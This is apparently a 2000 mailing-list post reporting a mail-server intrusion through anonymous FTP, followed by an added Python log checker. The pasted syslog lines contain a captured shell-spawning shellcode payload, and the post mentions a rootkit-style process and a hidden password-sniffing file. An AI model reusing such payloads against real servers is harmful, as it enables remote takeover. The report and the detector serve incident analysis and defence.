Frank on Sat, 2 Sep 2000 15:53:57 +0200



Successful Intrusion into my system


Just thought you guys would want to know about a successful hack (dunno if
you've decided whether that's the right word yet?) into my mail server.

I realised something was wrong when I couldn't find <ifconfig> or <ps>. They
had been deleted and a process called t0rns or something was running when I
reinstalled <ps>. This seemed to have been logging all usernames and
passwords in a file called something like /usr/lib/.puta/system.

On checking the log I saw the following output:-

Sep  2 05:55:46 mail ftpd[4233]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], benjew@xxxxxxxxxxx
Sep  2 05:55:46 mail ftpd[4234]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], benjew@xxxxxxxxxxx
Sep  2 05:55:51 mail ftpd[4237]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], ????????????????????????????
????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1À1Û1ɰFÍ?1À1
ÛC?ÙA°?Í?ëk^1À1É?^^A?F^Df¹ÿ^A°'Í?1À?^^A°=Í?1À1Û?^
H?C^B1ÉþÉ1À?^^H°^LÍ?þÉuó1À?F^I?^^H°=Í?þ^N°0þÈ?F^D1À?F^G?v^H?F^L?ó?N^H?V^L°^K
Í?1À1Û°^AÍ?è?ÿÿÿ0bin0sh1..11
Sep  2 05:55:52 mail ftpd[4238]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], ????????????????????????????
????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1À1Û1ɰFÍ?1À1
ÛC?ÙA°?Í?ëk^1À1É?^^A?F^Df¹ÿ^A°'Í?1À?^^A°=Í?1À1Û?^
H?C^B1ÉþÉ1À?^^H°^LÍ?þÉuó1À?F^I?^^H°=Í?þ^N°0þÈ?F^D1À?F^G?v^H?F^L?ó?N^H?V^L°^K
Í?1À1Û°^AÍ?è?ÿÿÿ0bin0sh1..11
Sep  2 07:59:34 mail syslogd 1.3-3: restart.

I am at present incredibly busy and therefore am no longer subscribed to the
glug. That'll teach me to allow anonymous ftp on my server!!

Frank
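
Added example, not part of Frank's message: a small log check that re-joins wrapped syslog lines and flags anonymous FTP logins whose password field is overlong or carries non-printable bytes, the pattern visible in the excerpt above. The function names, the 128-character threshold and the sample lines (documentation host and address) are assumptions constructed for illustration.

```python
import re

# Start of a syslog record: "Sep  2 05:55:46 host rest-of-message"
HEADER = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d \S+ (.*)$", re.S)
# ftpd anonymous login message; the last group is the password the client sent
ANON = re.compile(
    r"^ftpd\[(\d+)\]: ANONYMOUS FTP LOGIN FROM\s+\S+\s+\[([\d.]+)\],\s*(.*)$", re.S)
MAX_LEN = 128  # assumed upper bound for a plausible e-mail style password


def records(lines):
    """Re-join wrapped lines: a line without a syslog header continues the previous record."""
    current = None
    for line in lines:
        line = line.rstrip("\n")
        if HEADER.match(line):
            if current is not None:
                yield current
            current = line
        elif current is not None:
            current += " " + line
    if current is not None:
        yield current


def suspicious_logins(lines):
    """Return (pid, source_ip, reasons) for anonymous logins with an abnormal password field."""
    findings = []
    for rec in records(lines):
        m = ANON.match(HEADER.match(rec).group(1))
        if not m:
            continue
        pid, ip, ident = m.groups()
        reasons = []
        if len(ident) > MAX_LEN:
            reasons.append("overlong")
        if any(ord(c) < 0x20 or ord(c) > 0x7E for c in ident):
            reasons.append("non-printable")
        if reasons:
            findings.append((pid, ip, reasons))
    return findings


# Constructed sample in the same layout as the excerpt (not the original log data).
SAMPLE = [
    "Sep  2 05:55:46 mail ftpd[4233]: ANONYMOUS FTP LOGIN FROM",
    "host.example.org [192.0.2.10], user@example.org",
    "Sep  2 05:55:51 mail ftpd[4237]: ANONYMOUS FTP LOGIN FROM",
    "host.example.org [192.0.2.10], " + "?" * 70,
    "?" * 76,
    "?" * 40 + "\xc0\xdb\x01 filler",
    "Sep  2 07:59:34 mail syslogd 1.3-3: restart.",
]

if __name__ == "__main__":
    for finding in suspicious_logins(SAMPLE):
        print(finding)
```

A hit from a check like this only shows that an abnormal login was logged; the host still needs the usual integrity review, since binaries such as <ps> were replaced here.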